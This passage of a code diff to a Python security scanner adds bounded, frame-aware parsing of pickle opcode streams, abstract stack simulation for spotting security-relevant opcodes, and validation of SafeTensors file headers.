 PROTO0_1_START_BYTES: bytes = b"()]}cilp0FGIJKLMNPSTUVX"
 PROTO0_1_IGNORABLE_TRAILING_BYTES: bytes = b" \t\r\n\x00"
 PROTO0_1_PREFIX_TRUNCATION_ERROR_PREFIXES: tuple[str, ...] = (
     "pickle exhausted before seeing STOP",
     "no newline found when trying to read ",
 )
+
+
+@dataclass
+class _PickleProbeWorkBudget:
+    """Bound total work shared by every alternate FRAME interpretation."""
+
+    remaining_opcodes: int = PROTO0_1_MAX_PROBE_OPCODES
+    remaining_frame_branches: int = _PICKLE_FRAME_BRANCH_MAX
+    hashability_cache: dict[int, tuple[Any, bool]] = field(default_factory=dict)
+    saw_frame: bool = False
+
+
+_INVALID_PICKLE_NUMERIC_LINE = b"!\n"
+_PICKLE_FLOAT_LINE_RE = re.compile(
+    rb"[+-]?(?:(?:\d+(?:\.\d*)?|\.\d+)(?:[eE][+-]?\d+)?|inf(?:inity)?|nan)",
+    re.IGNORECASE,
+)
+_PICKLE_LEGACY_OCTAL_INT_RE = re.compile(rb"[ \t\r\v\f]*[+-]?0[0-7]+")
+
+
+class _PickleNumericOperandLimitExceeded(ValueError):
+    """Raised when a numeric operand exceeds the bounded parser budget."""
+
+
+class _PickleStructuralArgumentInconclusive(ValueError):
+    """Raised when streamed argument validation reaches its bounded budget."""
+
+
+def _canonicalize_cpython_numeric_line(opcode_byte: int, line: bytes) -> bytes | None:
+    """Return a pickletools-readable line matching CPython's numeric parser."""
+    if opcode_byte not in b"IFLpg" or not line.endswith(b"\n"):
+        return None
+
+    raw_value = line[:-1]
+    had_nul = b"\x00" in raw_value
+    if opcode_byte == ord("L") and not had_nul and raw_value.endswith(b"L"):
+        raw_value = raw_value[:-1]
+    numeric_prefix = raw_value.split(b"\x00", 1)[0]
+    if len(numeric_prefix) > _PICKLE_NUMERIC_OPERAND_MAX_BYTES:
+        raise _PickleNumericOperandLimitExceeded("pickle numeric operand exceeded bounded parser limit")
+    try:
+        if opcode_byte == ord("I"):
+            if not numeric_prefix and had_nul:
+                value: int | float = 0
+            else:
+                try:
+                    value = int(numeric_prefix, 0)
+                except ValueError:
+                    if _PICKLE_LEGACY_OCTAL_INT_RE.fullmatch(numeric_prefix) is None:
+                        raise
+                    value = int(numeric_prefix, 8)
+            canonical = str(value).encode()
+        elif opcode_byte == ord("F"):
+            if _PICKLE_FLOAT_LINE_RE.fullmatch(numeric_prefix) is None:
+                return _INVALID_PICKLE_NUMERIC_LINE
+            value = float(numeric_prefix)
+            if math.isinf(value) and b"inf" not in numeric_prefix.lower():
+                return _INVALID_PICKLE_NUMERIC_LINE
+            canonical = repr(value).encode()
+        elif opcode_byte == ord("L"):
+            if not numeric_prefix:
+                return _INVALID_PICKLE_NUMERIC_LINE
+            canonical = str(int(numeric_prefix, 0)).encode()
+        else:
+            if not numeric_prefix:
+                return _INVALID_PICKLE_NUMERIC_LINE
+            value = int(numeric_prefix, 10)
+            max_value = _PICKLE_MAX_STRUCTURAL_MEMO_INDEX if opcode_byte == ord("p") else sys.maxsize
+            if not 0 <= value <= max_value:
+                return _INVALID_PICKLE_NUMERIC_LINE
+            canonical = str(value).encode()
+    except (OverflowError, ValueError):
+        return _INVALID_PICKLE_NUMERIC_LINE
+    return canonical + b"\n"
+
+
+class _PickleProbeStream:
+    """Bounded byte stream that mirrors CPython's FRAME read boundaries."""
+
+    def __init__(self, sample: bytes, start: int = 0, *, frame_aware: bool = False):
+        self._sample = sample
+        self._raw_position = start
+        self._frame_aware = frame_aware
+        self._frame_position: int | None = None
+        self._frame_end: int | None = None
+        self._linear_frame_ends: list[int] = []
+        self._current_opcode_byte: int | None = None
+        self.last_read_origin = start
+
+    def _drop_exhausted_frame(self) -> None:
+        if self._frame_position is not None and self._frame_end is not None and self._frame_position >= self._frame_end:
+            self._frame_position = None
+            self._frame_end = None
+
+    def tell(self) -> int:
+        self._drop_exhausted_frame()
+        return self._raw_position if self._frame_position is None else self._frame_position
+
+    def set_current_opcode(self, opcode_byte: int | None) -> None:
+        self._current_opcode_byte = opcode_byte
+
+    def read(self, size: int = -1, /) -> bytes:
+        if size == 0:
+            return b""
+        self._drop_exhausted_frame()
+        if size < 0:
+            if self._frame_position is not None and self._frame_end is not None:
+                size = self._frame_end - self._frame_position
+            else:
+                size = len(self._sample) - self._raw_position
+
+        if self._frame_position is not None and self._frame_end is not None:
+            if size <= self._frame_end - self._frame_position:
+                start = self._frame_position
+                self._frame_position += size
+                self.last_read_origin = start
+                return self._sample[start : start + size]
+            self._frame_position = None
+            self._frame_end = None
+
+        start = self._raw_position
+        self._raw_position = min(len(self._sample), start + size)
+        self.last_read_origin = start
+        return self._sample[start : start + size]
+
+    def readline(self, size: int = -1, /) -> bytes:
+        self._drop_exhausted_frame()
+        if self._frame_position is not None and self._frame_end is not None:
+            search_end = self._frame_end if size < 0 else min(self._frame_end, self._frame_position + size)
+            newline_index = self._sample.find(b"\n", self._frame_position, search_end)
+            if newline_index >= 0:
+                start = self._frame_position
+                self._frame_position = newline_index + 1
+                self.last_read_origin = start
+                line = self._sample[start : newline_index + 1]
+                return _canonicalize_cpython_numeric_line(self._current_opcode_byte or -1, line) or line
+            self._frame_position = None
+            self._frame_end = None
+
+        start = self._raw_position
+        search_end = len(self._sample) if size < 0 else min(len(self._sample), start + size)
+        newline_index = self._sample.find(b"\n", start, search_end)
+        end = search_end if newline_index < 0 else newline_index + 1
+        self._raw_position = end
+        self.last_read_origin = start
+        line = self._sample[start:end]
+        return _canonicalize_cpython_numeric_line(self._current_opcode_byte or -1, line) or line
+
+    def read_combining(self, size: int) -> bytes:
+        """Read payload bytes that CPython joins across a frame refill."""
+        self._drop_exhausted_frame()
+        if self._frame_position is None or self._frame_end is None or size <= self._frame_end - self._frame_position:
+            return self.read(size)
+        start = self._frame_position
+        prefix = self._sample[start : self._frame_end]
+        self._frame_position = None
+        self._frame_end = None
+        remaining = size - len(prefix)
+        raw_start = self._raw_position
+        self._raw_position = min(len(self._sample), raw_start + remaining)
+        self.last_read_origin = start
+        return prefix + self._sample[raw_start : raw_start + remaining]
+
+    def load_frame(self, frame_size: int) -> None:
+        """Load one frame payload, discarding a partial enclosing frame like CPython."""
+        if frame_size < 0:
+            raise ValueError("negative FRAME size")
+        if not self._frame_aware:
+            frame_end = self._raw_position + frame_size
+            if frame_end > len(self._sample):
+                raise ValueError("pickle exhausted while loading FRAME payload")
+            self._linear_frame_ends.append(frame_end)
+            return
+        self._drop_exhausted_frame()
+        if self._frame_position is not None and self._frame_end is not None:
+            if frame_size <= self._frame_end - self._frame_position:
+                start = self._frame_position
+                self._frame_position += frame_size
+                retained_frame_end = self._frame_end
+            else:
+                self._frame_position = None
+                self._frame_end = None
+                start = self._raw_position
+                self._raw_position = min(len(self._sample), start + frame_size)
+                retained_frame_end = start + frame_size
+        else:
+            start = self._raw_position
+            self._raw_position = min(len(self._sample), start + frame_size)
+            retained_frame_end = start + frame_size
+        if start + frame_size > len(self._sample):
+            raise ValueError("pickle exhausted while loading FRAME payload")
+        self._frame_position = start
+        self._frame_end = retained_frame_end
+
+    def frame_resume_positions(self) -> list[int]:
+        """Return where independent loads can resume after active frames."""
+        if not self._frame_aware:
+            current_position = self.tell()
+            self._linear_frame_ends = [end for end in self._linear_frame_ends if end > current_position]
+            return sorted(set(self._linear_frame_ends))
+        self._drop_exhausted_frame()
+        if self._frame_position is None or self._raw_position <= self._frame_position:
+            return []
+        return [self._raw_position]
+
+
+def _gen_pickle_probe_ops(stream: _PickleProbeStream) -> Iterator[tuple[Any, Any, int]]:
+    """Yield pickle opcodes while applying FRAME loading semantics to the probe stream."""
+    while True:
+        code = stream.read(1)
+        position = stream.last_read_origin
+        if not code:
+            raise ValueError("pickle exhausted before seeing STOP")
+        opcode = _PICKLE_OPCODE_BY_BYTE.get(code[0])
+        if opcode is None:
+            raise ValueError(f"at position {position}, opcode {code!r} unknown")
+        stream.set_current_opcode(code[0])
+        argument: Any
+        try:
+            if opcode.name in {"GLOBAL", "INST"}:
+                raw_module_name = stream.readline()
+                if not raw_module_name.endswith(b"\n"):
+                    raise ValueError(f"not enough data to read {opcode.name} argument")
+                argument_encoding = "ascii" if opcode.name == "INST" else "utf-8"
+                try:
+                    module_name = raw_module_name[:-1].decode(argument_encoding)
+                except UnicodeDecodeError as exc:
+                    raise ValueError(f"invalid module name in {opcode.name} argument") from exc
+                if not module_name:
+                    raise ValueError(f"empty module name in {opcode.name} argument")
+                raw_global_name = stream.readline()
+                if not raw_global_name.endswith(b"\n"):
+                    raise ValueError(f"not enough data to read {opcode.name} argument")
+                try:
+                    global_name = raw_global_name[:-1].decode(argument_encoding)
+                except UnicodeDecodeError as exc:
+                    raise ValueError(f"invalid global name in {opcode.name} argument") from exc
+                if not global_name:
+                    raise ValueError(f"empty global name in {opcode.name} argument")
+                argument = ("global_argument", module_name, global_name)
+            elif opcode.name in {"SHORT_BINBYTES", "BINBYTES", "BINBYTES8", "BYTEARRAY8"}:
+                length_size = {"SHORT_BINBYTES": 1, "BINBYTES": 4, "BINBYTES8": 8, "BYTEARRAY8": 8}[opcode.name]
+                length_bytes = stream.read(length_size)
+                if len(length_bytes) != length_size:
+                    raise ValueError(f"not enough data to read {opcode.name} length")
+                payload_size = int.from_bytes(length_bytes, "little")
+                if payload_size > sys.maxsize:
+                    raise ValueError(f"{opcode.name} byte count exceeds sys.maxsize")
+                payload = stream.read_combining(payload_size)
+                if len(payload) != payload_size:
+                    raise ValueError(f"not enough data to read {opcode.name} payload")
+                argument = bytearray(payload) if opcode.name == "BYTEARRAY8" else payload
+            else:
+                argument = None if opcode.arg is None else opcode.arg.reader(cast(BinaryIO, stream))
+        finally:
+            stream.set_current_opcode(None)
+        if opcode.name == "FRAME":
+            if not isinstance(argument, int):
+                raise ValueError("invalid FRAME size")
+            stream.load_frame(argument)
+        yield opcode, argument, position
+        if opcode.name == "STOP":
+            break
+
+
 PROTO0_1_TRIVIAL_LEADING_OPCODES: frozenset[str] = frozenset(
     {
         "MARK",
@@ -1792,6 +2069,171 @@ def _pickle_opcode_argument_end(
     return (end, False, 0) if end <= file_size else (None, False, 0)
 
 
+def _pickle_structural_argument(
+    handle: BinaryIO,
+    sample: bytes,
+    opcode: Any,
+    argument_offset: int,
+    argument_end: int,
+    file_size: int,
+    validation_budget: list[int],
+) -> tuple[bool, Any]:
+    """Decode only the small argument fields needed for abstract stack execution."""
+
+    def charge_validation_bytes(byte_count: int) -> None:
+        if byte_count > validation_budget[0]:
+            raise _PickleStructuralArgumentInconclusive("pickle structural validation budget exhausted")
+        validation_budget[0] -= byte_count
+
+    opcode_name = opcode.name
+    if opcode_name in {"BINPUT", "BINGET", "PROTO", "EXT1"}:
+        value = _read_pickle_structure_bytes(handle, sample, argument_offset, 1, file_size)
+        return (False, None) if value is None else (True, value[0])
+    if opcode_name in {"LONG_BINPUT", "LONG_BINGET", "EXT4"}:
+        value = _read_pickle_structure_bytes(handle, sample, argument_offset, 4, file_size)
+        return (False, None) if value is None else (True, int.from_bytes(value, "little"))
+    if opcode_name == "EXT2":
+        value = _read_pickle_structure_bytes(handle, sample, argument_offset, 2, file_size)
+        return (False, None) if value is None else (True, int.from_bytes(value, "little"))
+    if opcode_name in {"GLOBAL", "INST"}:
+        lines = _read_pickle_structure_bytes(
+            handle,
+            sample,
+            argument_offset,
+            argument_end - argument_offset,
+            file_size,
+        )
+        if lines is None:
+            return False, None
+        module_name, separator, remainder = lines.partition(b"\n")
+        global_name, second_separator, trailing = remainder.partition(b"\n")
+        if not module_name or not separator or not global_name or not second_separator or trailing:
+            return False, None
+        try:
+            argument_encoding = "ascii" if opcode_name == "INST" else "utf-8"
+            return True, (
+                "global_argument",
+                module_name.decode(argument_encoding),
+                global_name.decode(argument_encoding),
+            )
+        except UnicodeDecodeError:
+            return False, None
+    if opcode_name in {"PUT", "GET", "INT", "LONG", "FLOAT"}:
+        line = _read_pickle_structure_bytes(
+            handle,
+            sample,
+            argument_offset,
+            argument_end - argument_offset,
+            file_size,
+        )
+        if line is None:
+            return False, None
+        canonical = _canonicalize_cpython_numeric_line(opcode.code.encode("latin-1")[0], line)
+        if canonical is None or canonical == _INVALID_PICKLE_NUMERIC_LINE:
+            return False, None
+        if opcode_name in {"PUT", "GET", "INT", "LONG"}:
+            return True, int(canonical[:-1])
+        return True, float(canonical[:-1])
+    if opcode.arg is not None and opcode.arg.n == -1:
+        line_argument = _read_pickle_structure_bytes(
+            handle,
+            sample,
+            argument_offset,
+            argument_end - argument_offset,
+            file_size,
+        )
+        if line_argument is None:
+            return False, None
+        reader = BytesIO(line_argument)
+        try:
+            parsed_argument = opcode.arg.reader(reader)
+        except (UnicodeError, ValueError):
+            return False, None
+        return (reader.tell() == len(line_argument), parsed_argument)
+    if opcode_name in {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8"}:
+        length_width = {"SHORT_BINUNICODE": 1, "BINUNICODE": 4, "BINUNICODE8": 8}[opcode_name]
+        payload_length = argument_end - argument_offset - length_width
+        if payload_length < 0:
+            return False, None
+        if payload_length > _PICKLE_UNICODE_VALIDATE_MAX_BYTES:
+            raise _PickleStructuralArgumentInconclusive("pickle Unicode validation budget exhausted")
+        charge_validation_bytes(payload_length)
+        decoder = codecs.getincrementaldecoder("utf-8")()
+        payload_offset = argument_offset + length_width
+        remaining = payload_length
+        try:
+            while remaining > 0:
+                chunk = _read_pickle_structure_bytes(
+                    handle,
+                    sample,
+                    payload_offset,
+                    min(4096, remaining),
+                    file_size,
+                )
+                if chunk is None:
+                    return False, None
+                decoder.decode(chunk, final=False)
+                payload_offset += len(chunk)
+                remaining -= len(chunk)
+            decoder.decode(b"", final=True)
+        except UnicodeDecodeError:
+            return False, None
+        return True, "" if payload_length == 0 else "validated"
+    if opcode_name == "BYTEARRAY8":
+        payload_length = argument_end - argument_offset - 8
+        return (payload_length >= 0, ("bytearray_length", max(payload_length, 0)))
+    if opcode_name in {"BININT", "BININT1", "BININT2"}:
+        width = {"BININT": 4, "BININT1": 1, "BININT2": 2}[opcode_name]
+        value = _read_pickle_structure_bytes(handle, sample, argument_offset, width, file_size)
+        if value is None:
+            return False, None
+        return True, int.from_bytes(value, "little", signed=opcode_name == "BININT")
+    if opcode_name in {"LONG1", "LONG4"}:
+        length_width = 1 if opcode_name == "LONG1" else 4
+        length_bytes = _read_pickle_structure_bytes(handle, sample, argument_offset, length_width, file_size)
+        if length_bytes is None:
+            return False, None
+        payload_length = int.from_bytes(length_bytes, "little", signed=opcode_name == "LONG4")
+        if payload_length < 0 or argument_offset + length_width + payload_length != argument_end:
+            return False, None
+        if payload_length > _PICKLE_UNICODE_VALIDATE_MAX_BYTES:
+            raise _PickleStructuralArgumentInconclusive("pickle integer validation budget exhausted")
+        charge_validation_bytes(payload_length)
+        leading_payload = _read_pickle_structure_bytes(
+            handle,
+            sample,
+            argument_offset + length_width,
+            min(payload_length, 8),
+            file_size,
+        )
+        if leading_payload is None:
+            return False, None
+        if payload_length <= 8:
+            return True, int.from_bytes(leading_payload, "little", signed=True)
+        extension_byte = b"\xff" if leading_payload[-1] & 0x80 else b"\x00"
+        remaining_offset = argument_offset + length_width + len(leading_payload)
+        remaining = payload_length - len(leading_payload)
+        while remaining > 0:
+            chunk = _read_pickle_structure_bytes(
+                handle,
+                sample,
+                remaining_offset,
+                min(4096, remaining),
+                file_size,
+            )
+            if chunk is None:
+                return False, None
+            if chunk.strip(extension_byte):
+                return True, "int_out_of_range"
+            remaining_offset += len(chunk)
+            remaining -= len(chunk)
+        return True, int.from_bytes(leading_payload, "little", signed=True)
+    if opcode_name == "FRAME":
+        value = _read_pickle_structure_bytes(handle, sample, argument_offset, 8, file_size)
+        return (False, None) if value is None else (True, int.from_bytes(value, "little"))
+    return True, None
+
+
 def _has_bounded_protocolless_binary_pickle_security_signal(
     file_path: Path,
     file_size: int,
@@ -1805,7 +2247,7 @@ def _has_bounded_protocolless_binary_pickle_security_signal(
     )
     if sample_state is True:
         return True
-    if not sample_is_prefix or len(sample) < 2 or _looks_like_binary_pickle_protocol(sample[:4]):
+    if not sample_is_prefix or len(sample) < 2:
         return False
 
     opcode_count = 0
@@ -1814,6 +2256,51 @@ def _has_bounded_protocolless_binary_pickle_security_signal(
     has_security_opcode = False
     has_pre_stop_security_opcode = False
     line_probe_bytes = 0
+    structural_validation_budget = [_PICKLE_UNICODE_VALIDATE_MAX_BYTES]
+    frame_probe_bytes_remaining = PROTO0_1_MAX_PROBE_BYTES
+    frame_branches_remaining = _PICKLE_FRAME_BRANCH_MAX
+    frame_work_budget = _PickleProbeWorkBudget()
+    frame_branch_started_for_load = False
+    saw_alternate_inconclusive = False
+    stack: list[Any] = []
+    memo: dict[Any, Any] = {}
+    hashability_cache: dict[int, tuple[Any, bool]] = {}
+
+    def negative_result() -> bool | None:
+        return None if saw_alternate_inconclusive else False
+
+    def classify_frame_branch(
+        handle: BinaryIO,
+        branch_offset: int,
+    ) -> bool | None:
+        nonlocal frame_branches_remaining, frame_probe_bytes_remaining, saw_alternate_inconclusive
+        remaining_size = file_size - branch_offset
+        if remaining_size <= 0:
+            return False
+        if frame_branches_remaining <= 0 or frame_probe_bytes_remaining <= 0:
+            saw_alternate_inconclusive = True
+            return None
+
+        frame_branches_remaining -= 1
+        probe_size = min(remaining_size, frame_probe_bytes_remaining)
+        handle.seek(branch_offset)
+        frame_sample = handle.read(probe_size)
+        frame_probe_bytes_remaining -= len(frame_sample)
+        if len(frame_sample) != probe_size:
+            saw_alternate_inconclusive = True
+            return None
+
+        alternate_state = _classify_initial_pickle_security_signal(
+            frame_sample,
+            sample_is_prefix=probe_size < remaining_size,
+            available_stream_length=remaining_size,
+            _work_budget=frame_work_budget,
+            _frame_aware=True,
+        )
+        if alternate_state is None:
+            saw_alternate_inconclusive = True
+        return alternate_state
+
     try:
         with file_path.open("rb") as handle:
             while offset < file_size:
@@ -1821,20 +2308,17 @@ def _has_bounded_protocolless_binary_pickle_security_signal(
                     return None
                 opcode_byte = _read_pickle_structure_bytes(handle, sample, offset, 1, file_size)
                 if opcode_byte is None:
-                    return has_binary_opcode and has_pre_stop_security_opcode
+                    return True if has_binary_opcode and has_pre_stop_security_opcode else negative_result()
                 opcode = _PICKLE_OPCODE_BY_BYTE.get(opcode_byte[0])
                 if opcode is None:
-                    return offset >= len(sample) and has_binary_opcode and has_pre_stop_security_opcode
+                    return (
+                        True
+                        if offset >= len(sample) and has_binary_opcode and has_pre_stop_security_opcode
+                        else negative_result()
+                    )
 
                 opcode_count += 1
                 opcode_name = opcode.name
-                if opcode_name in _PROTOCOLLESS_BINARY_PICKLE_OPCODES:
-                    has_binary_opcode = True
-                if opcode_name in _BINARY_PICKLE_SECURITY_OPCODES:
-                    has_security_opcode = True
-                if opcode_name in _PROTOCOLLESS_BINARY_PICKLE_PRE_STOP_SECURITY_OPCODES:
-                    has_pre_stop_security_opcode = True
-
                 argument_end, budget_exceeded, consumed_line_bytes = _pickle_opcode_argument_end(
                     handle,
                     sample,
@@ -1847,13 +2331,70 @@ def _has_bounded_protocolless_binary_pickle_security_signal(
                 if budget_exceeded:
                     return None
                 if argument_end is None:
-                    return offset >= len(sample) and has_binary_opcode and has_pre_stop_security_opcode
+                    return (
+                        True
+                        if offset >= len(sample) and has_binary_opcode and has_pre_stop_security_opcode
+                        else negative_result()
+                    )
+                argument_valid, argument = _pickle_structural_argument(
+                    handle,
+                    sample,
+                    opcode,
+                    offset + 1,
+                    argument_end,
+                    file_size,
+                    structural_validation_budget,
+                )
+                if not argument_valid or not _apply_pickle_stack_effect(
+                    opcode,
+                    argument,
+                    stack,
+                    memo,
+                    hashability_cache,
+                ):
+                    return True if has_pre_stop_security_opcode else negative_result()
+                if opcode_name == "PROTO" and (
+                    not isinstance(argument, int) or argument > _MAX_FORWARD_COMPAT_BINARY_PICKLE_PROTOCOL
+                ):
+                    return True if has_pre_stop_security_opcode else negative_result()
+                if opcode_name in {"EXT1", "EXT2", "EXT4"} and (not isinstance(argument, int) or argument <= 0):
+                    return True if has_pre_stop_security_opcode else negative_result()
+                if opcode_name in {"PUT", "BINPUT", "LONG_BINPUT"} and (
+                    not isinstance(argument, int) or argument > _PICKLE_MAX_STRUCTURAL_MEMO_INDEX
+                ):
+                    return True if has_pre_stop_security_opcode else negative_result()
+                if opcode_name == "FRAME" and isinstance(argument, int) and argument_end + argument > file_size:
+                    return True if has_pre_stop_security_opcode else negative_result()
+                if opcode_name == "FRAME" and not frame_branch_started_for_load:
+                    frame_branch_started_for_load = True
+                    frame_state = classify_frame_branch(handle, offset)
+                    if frame_state is True:
+                        return True
+                    if frame_state is False and (stack or memo):
+                        saw_alternate_inconclusive = True
+                if opcode_name in _PROTOCOLLESS_BINARY_PICKLE_OPCODES:
+                    has_binary_opcode = True
+                if opcode_name in _BINARY_PICKLE_SECURITY_OPCODES:
+                    has_security_opcode = True
+                if opcode_name in _PROTOCOLLESS_BINARY_PICKLE_PRE_STOP_SECURITY_OPCODES:
+                    has_pre_stop_security_opcode = True
                 if opcode_name == "STOP":
-                    return offset >= len(sample) and opcode_count >= 2 and has_binary_opcode and has_security_opcode
+                    if has_security_opcode:
+                        if offset >= len(sample) and opcode_count >= 2 and has_binary_opcode:
+                            return True
+                        return negative_result()
+                    stack.clear()
+                    has_security_opcode = False
+                    has_pre_stop_security_opcode = False
+                    frame_branch_started_for_load = False
                 offset = argument_end
+    except (_PickleNumericOperandLimitExceeded, _PickleStructuralArgumentInconclusive):
+        return None
     except OSError:
-        return False
-    return has_binary_opcode and has_pre_stop_security_opcode
+        return None
+    if has_binary_opcode and has_pre_stop_security_opcode:
+        return True
+    return negative_result()
 
 
 def _read_pickle_probe_sample(path: Path, size: int, header16: bytes) -> bytes:
@@ -1926,23 +2467,27 @@ def detect_pytorch_binary_supplemental_format(path: str) -> str | None:
     return None
 
 
-def _is_safetensors_routing_candidate(path: Path | None, magic8: bytes, file_size: int) -> bool:
-    """Recognize SafeTensors framing or retain oversized plausible headers."""
+def _validated_safetensors_routing_header(
+    path: Path | None,
+    magic8: bytes,
+    file_size: int,
+) -> tuple[int, bytes | None] | None:
+    """Return a bounded validated header, or retain an oversized plausible one."""
     if file_size <= 8 or len(magic8) < 8:
-        return False
+        return None
 
     try:
         header_len = struct.unpack("<Q", magic8)[0]
     except struct.error:
-        return False
+        return None
 
     if header_len <= 0:
-        return False
+        return None
     if header_len > file_size - 8:
-        return False
+        return None
 
     if path is None:
-        return False
+        return None
 
     # The scanner fails closed on headers above this bounded parse budget.
     # Retain plausible object headers without parsing attacker-sized metadata.
@@ -1950,26 +2495,690 @@ def _is_safetensors_routing_candidate(path: Path | None, magic8: bytes, file_siz
         try:
             with path.open("rb") as handle:
                 handle.seek(8)
-                return handle.read(1) == b"{"
+                return (header_len, None) if handle.read(1) == b"{" else None
         except OSError:
-            return False
+            return None
 
     try:
         with path.open("rb") as handle:
             handle.seek(8)
             header = handle.read(header_len)
     except OSError:
-        return False
+        return None
 
     if len(header) != header_len or not header.startswith(b"{"):
-        return False
+        return None
 
     try:
         parsed_header = json.loads(header.decode("utf-8"))
-    except (UnicodeDecodeError, json.JSONDecodeError):
+    except (UnicodeDecodeError, ValueError, RecursionError):
+        return None
+
+    return (header_len, header) if isinstance(parsed_header, dict) else None
+
+
+def _is_safetensors_routing_candidate(path: Path | None, magic8: bytes, file_size: int) -> bool:
+    """Recognize SafeTensors framing or retain oversized plausible headers."""
+    return _validated_safetensors_routing_header(path, magic8, file_size) is not None
+
+
+def has_safetensors_routing_candidate(path: str) -> bool:
+    """Return whether a local file has bounded plausible SafeTensors framing."""
+    file_path = Path(path)
+    try:
+        file_size = file_path.stat().st_size
+        magic8 = read_magic_bytes(path, 8)
+    except OSError:
+        return False
+    return _is_safetensors_routing_candidate(file_path, magic8, file_size)
+
+
+def _apply_pickle_stack_effect(
+    opcode: Any,
+    argument: Any,
+    stack: list[Any],
+    memo: dict[Any, Any],
+    hashability_cache: dict[int, tuple[Any, bool]],
+) -> bool:
+    """Apply pickle stack semantics, returning False when execution cannot continue."""
+    before = opcode.stack_before
+    after = opcode.stack_after
+    num_to_pop = len(before)
+    preserved_value: Any | None = None
+    slice_size = 0
+    tuple_values: list[Any] = []
+
+    def value_kind(value: Any) -> str | None:
+        if isinstance(value, tuple | list) and value and isinstance(value[0], str):
+            return value[0]
+        if isinstance(value, str):
+            return value
+        return getattr(value, "name", None)
+
+    def is_known_hashable(value: Any) -> bool:
+        value_id = id(value)
+        cached = hashability_cache.get(value_id)
+        if cached is not None and cached[0] is value:
+            return cached[1]
+
+        pending: list[tuple[Any, bool]] = [(value, False)]
+        while pending:
+            current, expanded = pending.pop()
+            kind = value_kind(current)
+            if kind != "tuple" or not isinstance(current, tuple) or len(current) != 2:
+                continue
+            current_id = id(current)
+            cached = hashability_cache.get(current_id)
+            if cached is not None and cached[0] is current:
+                continue
+
+            if expanded:
+                is_hashable = True
+                for child in current[1]:
+                    child_kind = value_kind(child)
+                    if child_kind in {"bytearray", "dict", "list", "set", "unhashable_buffer"}:
+                        is_hashable = False
+                        break
+                    if child_kind == "tuple" and isinstance(child, tuple):
+                        child_cached = hashability_cache.get(id(child))
+                        if child_cached is not None and child_cached[0] is child and not child_cached[1]:
+                            is_hashable = False
+                            break
+                hashability_cache[current_id] = (current, is_hashable)
+                continue
+
+            pending.append((current, True))
+            pending.extend(
+                (child, False) for child in current[1] if value_kind(child) == "tuple" and isinstance(child, tuple)
+            )
+
+        cached = hashability_cache.get(value_id)
+        return (
+            cached[1]
+            if cached is not None and cached[0] is value
+            else value_kind(value)
+            not in {
+                "bytearray",
+                "dict",
+                "list",
+                "set",
+                "unhashable_buffer",
+            }
+        )
+
+    def is_known_invalid_callable_or_instance(value: Any) -> bool:
+        return value_kind(value) in {
+            "None",
+            "bool",
+            "buffer",
+            "bytearray",
+            "bytes",
+            "bytes_or_str",
+            "dict",
+            "empty_string",
+            "float",
+            "frozenset",
+            "int",
+            "int_out_of_range",
+            "int_or_bool",
+            "int_unknown",
+            "list",
+            "set",
+            "str",
+            "tuple",
+            "unhashable_buffer",
+        }
+
+    def is_known_invalid_tuple_operand(value: Any) -> bool:
+        return value_kind(value) not in {"any", "tuple"}
+
+    pops_mark = pickletools.markobject in before or (
+        opcode.name == "POP" and stack and stack[-1] is pickletools.markobject
+    )
+    if pops_mark:
+        if stack and stack[-1] is pickletools.markobject:
+            mark_index = len(stack) - 1
+        else:
+            mark_index = next(
+                (index for index in range(len(stack) - 1, -1, -1) if stack[index] is pickletools.markobject),
+                -1,
+            )
+        if mark_index < 0:
+            return False
+        slice_size = len(stack) - mark_index - 1
+        slice_values = stack[mark_index + 1 :]
+        if opcode.name in {"DICT", "SETITEMS"} and slice_size % 2:
+            return False
+        if opcode.name in {"DICT", "SETITEMS"} and not all(is_known_hashable(key) for key in slice_values[::2]):
+            return False
+        if opcode.name in {"ADDITEMS", "FROZENSET"} and not all(is_known_hashable(value) for value in slice_values):
+            return False
+        if opcode.name == "TUPLE":
+            tuple_values = slice_values
+        if opcode.name in {"APPENDS", "SETITEMS", "ADDITEMS"}:
+            if mark_index == 0 or stack[mark_index - 1] is pickletools.markobject:
+                return False
+            preserved_value = stack[mark_index - 1]
+            container_kind = value_kind(preserved_value)
+            if slice_size == 0:
+                pass
+            elif opcode.name == "APPENDS":
+                if container_kind == "any":
+                    pass
+                elif container_kind == "list" or (
+                    container_kind == "bytearray"
+                    and all(
+                        value_kind(value) in {"any", "int_unknown"}
+                        or (isinstance(value, tuple) and value[0] == "int" and 0 <= value[1] <= 255)
+                        for value in slice_values
+                    )
+                ):
+                    preserved_value[1] += slice_size
+                else:
+                    return False
+            elif opcode.name == "SETITEMS":
+                if container_kind in {"any", "dict"}:
+                    pass
+                elif container_kind in {"list", "bytearray"}:
+                    for key, value in zip(slice_values[::2], slice_values[1::2], strict=True):
+                        if value_kind(key) not in {"any", "int_unknown"} and (
+                            not isinstance(key, tuple)
+                            or key[0] != "int"
+                            or not -preserved_value[1] <= key[1] < preserved_value[1]
+                        ):
+                            return False
+                        if container_kind == "bytearray" and not (
+                            value_kind(value) in {"any", "int_unknown"}
+                            or (isinstance(value, tuple) and value[0] == "int" and 0 <= value[1] <= 255)
+                        ):
+                            return False
+                else:
+                    return False
+            elif container_kind not in {"any", "set"}:
+                return False
+        if opcode.name == "OBJ" and (slice_size < 1 or is_known_invalid_callable_or_instance(slice_values[0])):
+            return False
+        del stack[mark_index:]
+        num_to_pop = before.index(pickletools.markobject) if pickletools.markobject in before else 0
+
+    if len(stack) < num_to_pop:
+        return False
+    if not pops_mark and num_to_pop and any(value is pickletools.markobject for value in stack[-num_to_pop:]):
+        return False
+    if opcode.name == "REDUCE" and (
+        is_known_invalid_callable_or_instance(stack[-2]) or is_known_invalid_tuple_operand(stack[-1])
+    ):
+        return False
+    if opcode.name == "STACK_GLOBAL" and any(
+        value_kind(value) not in {"any", "bytes_or_str", "empty_string", "str"} for value in stack[-2:]
+    ):
+        return False
+    if opcode.name == "READONLY_BUFFER" and value_kind(stack[-1]) not in {
+        "any",
+        "buffer",
+        "bytearray",
+        "bytes",
+        "bytes_or_str",
+        "unhashable_buffer",
+    }:
+        return False
+    if opcode.name == "NEWOBJ" and (
+        is_known_invalid_callable_or_instance(stack[-2]) or is_known_invalid_tuple_operand(stack[-1])
+    ):
+        return False
+    if opcode.name == "NEWOBJ_EX" and (
+        is_known_invalid_callable_or_instance(stack[-3])
+        or is_known_invalid_tuple_operand(stack[-2])
+        or value_kind(stack[-1]) not in {"any", "dict"}
+    ):
+        return False
+    if opcode.name == "BUILD" and value_kind(stack[-1]) != "None" and is_known_invalid_callable_or_instance(stack[-2]):
+        return False
